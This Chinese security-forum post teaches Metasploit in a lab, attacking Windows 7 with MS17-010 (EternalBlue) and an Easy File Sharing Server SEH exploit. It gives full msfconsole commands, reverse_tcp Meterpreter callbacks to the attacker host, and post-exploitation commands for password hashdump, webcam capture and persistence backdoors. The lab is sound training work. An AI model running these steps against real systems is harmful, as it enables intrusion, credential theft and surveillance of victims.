[工具使用] Metasploit 攻击 Windows7 与 Easy File Sharing 教程

690 0
Honkers 2026-1-5 13:07:11 | 显示全部楼层 |阅读模式

本文通过两个真实漏洞实验,系统讲解 Metasploit 的使用流程、核心模块原理以及完整攻击链,适合网安初学者与竞赛备赛人员。


一、Metasploit 框架简介

Metasploit 是目前世界上最强大的渗透测试框架之一,集漏洞利用、权限获取、后渗透控制于一体,被广泛用于:

  • 攻防竞赛
  • 漏洞验证
  • 红队实战
  • 安全教学实验

二、Metasploit 基础知识

1. Metasploit 启动方式

方式说明
菜单启动Kali → Exploitation Tools → Metasploit
桌面快捷方式点击 msfconsole
命令行启动msfconsole(推荐)

2. Metasploit 核心模块

模块作用
exploit漏洞利用模块
payload攻击载荷(反弹 shell、meterpreter等)
auxiliary扫描、嗅探、爆破
post后渗透模块

3. 常用命令

命令作用
show显示模块/参数
search搜索漏洞
use使用模块
set设置参数
run / exploit启动攻击

三、实验一:永恒之蓝攻击 Windows 7(MS17-010)

实验环境

设备IP
Kali Linux192.168.10.10
Windows7(靶机)192.168.10.20

1. 检测是否存在 MS17-010 漏洞

  1. msfconsole
  2. use auxiliary/scanner/smb/smb_ms17_010
  3. set RHOSTS 192.168.10.20
  4. run
复制代码

出现 VULNERABLE 即表示存在漏洞。


2. 查找漏洞利用模块

  1. search ms17_010
复制代码

选择:

  1. use exploit/windows/smb/ms17_010_eternalblue
复制代码

3. 设置参数

  1. set RHOSTS 192.168.10.20
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST 192.168.10.10
复制代码

4. 发起攻击

  1. exploit
复制代码

成功后会看到:

  1. Meterpreter session 1 opened
复制代码

5. 控制靶机

  1. sysinfo
  2. ipconfig
  3. screenshot
  4. shell
复制代码

🎉 成功获取靶机控制权!


四、实验二:攻击 Easy File Sharing 软件

实验环境

设备IP
Kali192.168.10.10
Windows7(32位)192.168.10.30

1. 搜索漏洞模块

  1. search easyfilesharing
复制代码

选择:

  1. use exploit/windows/http/easyfilesharing_seh
复制代码

2. 设置参数

  1. set RHOSTS 192.168.10.30
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LHOST 192.168.10.10
复制代码

3. 启动靶机软件(在 Win7 上打开 Easy File Sharing Server)


4. 发起攻击

  1. exploit
复制代码

成功后会建立会话:

  1. sessions
  2. sessions -i 1
复制代码

五、Meterpreter 常用命令

命令功能
sysinfo查看系统
screenshot截图
webcam_snap摄像头
upload / download文件传输
hashdump提取密码
persistence设置后门

六、实验总结

技术点掌握情况
Metasploit 框架使用
漏洞扫描
EternalBlue 利用
软件漏洞攻击
Meterpreter 控制

七、适用人群

  • 网络安全初学者
  • HCIA / HCIP 实验
  • 职业院校竞赛
  • 护网实训
  • CTF 实战
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行